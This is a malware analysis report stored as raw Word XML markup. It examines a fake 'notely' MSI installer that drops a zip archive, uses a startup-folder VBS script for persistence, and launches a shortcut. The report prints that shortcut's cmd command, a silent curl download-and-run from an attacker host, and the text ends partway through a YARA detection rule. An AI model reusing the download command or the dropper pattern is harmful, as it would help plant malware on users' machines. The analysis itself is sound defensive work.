              <w:t>DesktopDesktopFoldernotely-setup-x64ProductName{6281E7BD-CA90-46E4-AA39-E47CC0EBBBDA}ProductCode{77190102-CDEB-4BCA-83E6-0AD39B5049CA}1.0.0ProductVersionNoCapSoftwareManufacturerNoCapSoftware LLCARPCONTACT1033ProductLanguageNEWERPRODUCTFOUNDSecureCustomProperties[VSDVERSIONMSG]ERRCA_CANCELNEWERVERSIONNEWERPRODUCTFOUND AND NOT Installed[VSDUIANDADVERTISED]ERRCA_UIANDADVERTISEDProductState=1FindRelatedProductsNOT InstalledLaunc0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Script for dropping the zip file and unzipper file can be seen, as well as the main installed file</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc85208000"/>
      <w:r>
        <w:t>Basic Dynamic Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Network Based</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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No network connections made with the initial execution of `notely-setup-x64.msi`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Running the `Emergreport.lnk` gives queries `consumerfinancerport.local` and gets a jpg file from hxxp://consumerfinancereport[.]local/blog/index/witchABy.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="5943600" cy="8578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41"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="857885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Host Based</w:t>
      </w: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After initial detonation, `Shortcut to notely.exe.ink` is made on the desktop. Opening that shows this window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="4257675" cy="3086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Grp="0" noSelect="0" noChangeAspect="1" noMove="0"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4257675" cy="3086100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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The shortcut reverts to `C:\Program Files (x86)\NoCapSoftware\notely-setup-x64\notely.exe`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="3484245" cy="51974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Grp="0" noSelect="0" noChangeAspect="1" noMove="0"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3484245" cy="5197475"/>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A file with the name `Emergreport.zip` is created in `C:\Users\Anonymous\AppData\Roaming`, which can be seen in the strings of `notely-setup-x64.msi`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="5943600" cy="44970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Grp="0" noSelect="0" noChangeAspect="1" noMove="0"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4497070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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`unzip.vbs` is found in the startup folder, which can also be seen in the strings of `notely-setup-x64.msi`. Taking a look at its shellcode, it does the following:</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Defines a function extracts files from a zip file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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Takes the paths for the zip file and extract path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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Checks if they are valid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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Extracts</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Creates a `WScript.Shell`</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 xml:space="preserve"> Sets the zip file path to the `%APPDATA%`</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Extracts the `Emergreport.zip` from that path to the same path</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Runs the file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>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drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="5943600" cy="44837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a:picLocks noGrp="0" noSelect="0" noChangeAspect="1" noMove="0"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4483735"/>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drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="5313045" cy="49764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a:picLocks noGrp="0" noSelect="0" noChangeAspect="1" noMove="0"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5313045" cy="4976495"/>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drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="4543425" cy="17519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Grp="0" noSelect="0" noChangeAspect="1" noMove="0"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4543425" cy="1751965"/>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The extracted file `Emergreport.lnk` is a shortcut to `cmd.exe`, with the following parameter: `%windir%\system32\cmd.exe /c call %windir%\system32\curl -s -o %appdata%\oneWitch.png consumerfinancereport[.]local/blog/index/witchABy.jpg &amp;&amp; ping -n 1 127.0.0.1 &gt; nul &amp;&amp; ping -n 1 127.0.0.1 &gt; nul &amp;&amp; ping -n 1 127.0.0.1 &gt; nul &amp;&amp; ping -n 1 127.0.0.1 &gt; nul &amp;&amp; %w`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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 xml:space="preserve">It does a cmd command execution where it </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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runs the curl command with:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>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`-s` (silent mode)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>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`-o` (output file)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>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`%appdata%\oneWitch.png` (path to output file)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>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`consumerfinancereport[.]local/blog/index/witchABy.jpg` (URL)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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does 4 ping commands on `127.0.0.1` with a count of `1` and saves the results in `nul`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>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drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="4214495" cy="31724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Grp="0" noSelect="0" noChangeAspect="1" noMove="0"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4214495" cy="3172460"/>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drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="5943600" cy="1391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a:picLocks noGrp="0" noSelect="0" noChangeAspect="1" noMove="0"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1391920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Running the file will create a `oneWitch.png` file in the directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="5943600" cy="4521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Grp="0" noSelect="0" noChangeAspect="1" noMove="0"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4521200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc85208001"/>
      <w:r>
        <w:t>Advanced Static Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Very little information was gathered through this phase. Nevertheless, “oneWitch.png” file appears to use the CRT (C RunTime Library).</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc85208006"/>
      <w:r>
        <w:t>Rules &amp; Signatures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>A full set of YARA rules is included in Appendix A.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Strings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>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$zip_file is the “Emergreport.zip” file that is installed when running the installer, this file contains the payload that drops the main DLL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>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$unzipper file is the persistent file that unzips the “Emergreport.zip” file and runs the payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Conditions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Check if the $zip_file and $unzipper_file files are in the strings of the installer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc85208007"/>
      <w:r>
        <w:rPr/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Appendices</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc85208008"/>
      <w:r>
        <w:t>Yara Rules</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Full </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Yara repository located at: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>http://github.com/</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AcePhire/Malwar</w:t>
      </w:r>
      <w:r>
        <w:t>eAnalysis</w:t>
      </w:r>
    </w:p>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f79c6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f8f8f2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f8f8f2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Emergreport_Dropper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f8f8f2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</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color w:val="ff79c6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>meta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f8f8f2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </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color w:val="f8f8f2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>last_updated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
